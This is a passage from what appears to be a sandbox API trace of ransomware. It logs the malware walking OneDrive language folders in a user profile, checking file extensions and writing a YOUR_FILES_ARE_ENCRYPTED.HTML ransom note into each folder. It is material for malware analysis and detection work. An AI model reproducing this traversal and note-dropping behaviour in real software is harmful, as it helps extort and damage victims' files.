(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ug\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.894] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.896] CloseHandle (hObject=0x5ac) returned 1 [0162.897] GetProcessHeap () returned 0x270000 [0162.898] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.898] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac49c350, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac5cce50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac5cce50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ug-arab", cAlternateFileName="")) returned 1 [0162.898] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug-arab") returned 79 [0162.898] GetProcessHeap () returned 0x270000 [0162.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.898] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug-arab" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug-arab") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug-arab" [0162.898] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug-arab", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug-arab\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug-arab\\*" [0162.898] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug-arab\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac49c350, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac5cce50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac5cce50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.898] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac49c350, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac5cce50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac5cce50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.898] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac5cce50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac5cce50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac5cce50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x128b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.898] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug-arab\\FileSync.LocalizedResources.dll.mui") returned 115 [0162.898] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.898] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.898] lstrlenW (lpString=".mui") returned 4 [0162.898] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.899] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac5cce50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac5cce50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac5cce50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x128b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.899] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.899] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0162.899] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ug-arab\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.899] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.901] CloseHandle (hObject=0x5ac) returned 1 [0162.902] GetProcessHeap () returned 0x270000 [0162.902] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.903] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac5cce50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac6fd950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac6fd950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="uk", cAlternateFileName="")) returned 1 [0162.903] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uk") returned 74 [0162.903] GetProcessHeap () returned 0x270000 [0162.903] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.903] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uk" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uk") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uk" [0162.903] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uk\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uk\\*" [0162.903] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uk\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac5cce50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac6fd950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac6fd950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.904] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac5cce50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac6fd950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac6fd950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.904] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac6fd950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac6fd950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac6fd950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.904] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uk\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.904] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.904] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.904] lstrlenW (lpString=".mui") returned 4 [0162.904] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.904] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac6fd950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac6fd950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac6fd950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.904] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.904] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.904] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\uk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.905] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.907] CloseHandle (hObject=0x5ac) returned 1 [0162.907] GetProcessHeap () returned 0x270000 [0162.908] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.908] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac6fd950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac8545b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac8545b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ur", cAlternateFileName="")) returned 1 [0162.908] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ur") returned 74 [0162.908] GetProcessHeap () returned 0x270000 [0162.908] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.908] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ur" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ur") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ur" [0162.908] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ur", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ur\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ur\\*" [0162.908] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ur\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac6fd950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac8545b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac8545b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.908] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac6fd950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac8545b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac8545b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.909] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac8545b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac8545b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac8545b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.909] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ur\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.909] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.909] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.909] lstrlenW (lpString=".mui") returned 4 [0162.909] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.909] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac8545b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac8545b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac8545b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.909] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.909] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ur\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ur\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ur\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.909] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.911] CloseHandle (hObject=0x5ac) returned 1 [0162.912] GetProcessHeap () returned 0x270000 [0162.913] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.913] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac8545b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac9850b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac9850b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="uz-latn-uz", cAlternateFileName="UZ-LAT~1")) returned 1 [0162.913] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uz-latn-uz") returned 82 [0162.913] GetProcessHeap () returned 0x270000 [0162.913] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.913] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uz-latn-uz" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uz-latn-uz") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uz-latn-uz" [0162.913] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uz-latn-uz", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uz-latn-uz\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uz-latn-uz\\*" [0162.913] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uz-latn-uz\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac8545b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac9850b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac9850b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.913] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac8545b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac9850b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac9850b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.913] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac9850b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac9850b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac9850b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x136b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.913] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uz-latn-uz\\FileSync.LocalizedResources.dll.mui") returned 118 [0162.913] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.913] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.913] lstrlenW (lpString=".mui") returned 4 [0162.913] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.913] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac9850b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac9850b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac9850b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x136b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.914] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.914] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uz-latn-uz\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0162.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uz-latn-uz\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\uz-latn-uz\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.914] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.916] CloseHandle (hObject=0x5ac) returned 1 [0162.917] GetProcessHeap () returned 0x270000 [0162.917] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.917] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac9850b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacab5bb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacab5bb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vi", cAlternateFileName="")) returned 1 [0162.917] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\vi") returned 74 [0162.917] GetProcessHeap () returned 0x270000 [0162.917] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.918] lstrcpyW (in: lpString1=0x74d2010, 